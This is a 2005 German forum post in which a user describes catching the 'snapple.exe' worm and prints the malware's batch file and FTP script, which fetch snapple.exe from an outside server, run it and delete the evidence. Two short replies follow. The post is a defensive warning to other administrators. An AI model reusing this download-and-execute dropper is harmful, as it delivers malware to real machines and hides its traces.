haggi
May 10, 2005, updated at May 11, 2005 (UTC)
view6544
view2
0
Goto Top

Trojaner "snapple.exe"

GermanQuestionMicrosoft
Hi, alle Viren-Wurm- und Troj.- Geplagten,

habe mir vor ein paar Tagen wegen einer kurzzeitig ausgeschalteten Firewall den "snapple.exe alias syshost.exe"-Wurm eingefangen. Zum Glück hat mein Virenscanner eine Verbreitung auf dem Rechner verhindern können. ABER interessant ist eine batch-Datei im Windows-Ordner, mit der dieses Teil immer wieder geladen werden könnte. Ich gebe sie hier mit der Kommandoerweiterung wieder:

1.bat

@echo off
ftp -n -v -s:.a
snapple.exe
del .a
del /F 1.bat
exit /y

.a

open wowvill.easydns.us 5192
user tr lo.max
binary
GET snapple.exe
bye

Damit wird snapple eingeschleust und gestartet. Da mein Virenscanner den Aufruf snapple.exe gestoppt hatte, haben die Löschbefehle nicht mehr gewirkt.

Also evtl. auch ähnliche Dateien suchen, wenn ein Schädling immer wieder kommt.
Ich habe meine Firewall jedenfalls für den o.g. Server (wowvill....) dicht gemacht.

Gute PC-Gesundheit.

Haggi
comment-contentCommentShareShare
Share on Facebook Share on Twitter Share on Reddit Share on Linkedin

Content-Key: 10524

Url: https://administrator.de/contentid/10524

Printed on: April 19, 2024 at 14:04 o'clock

2 Comments
Latest comment
Goto Top
Member: fritzo
fritzo May 10, 2005 at 21:10:29 (UTC)
Goto Top
scheint wohl von Anfängern geschrieben worden zu sein, das Teil. Ein Batchfile als Trigger und Vermehrungsroutine, interessant *grins*
Member: meto
meto May 11, 2005 at 05:13:29 (UTC)
Goto Top
Das sehe ich ähnlich. Wenn es einem so leicht gemacht wird, ist man als Admin immer sehr dankbar.
GermanQuestionMicrosoft
Hotly discussed
gleixnerdCheck of ZFW Firewallgleixnerd - 3 CommentsAlexWishaHow to set up and configure a Linux GRE tunnelAlexWisha - 3 CommentsjstrickerWIREGUARD VPN ON UDM PRO BEHIND FRITZBOX - HANDSHAKE DID NOT COMPLETEjstricker - 3 CommentsDaniEnd of Support dates for Office 2016, 2019 Apps und Productivity ServersDani - 1 Comment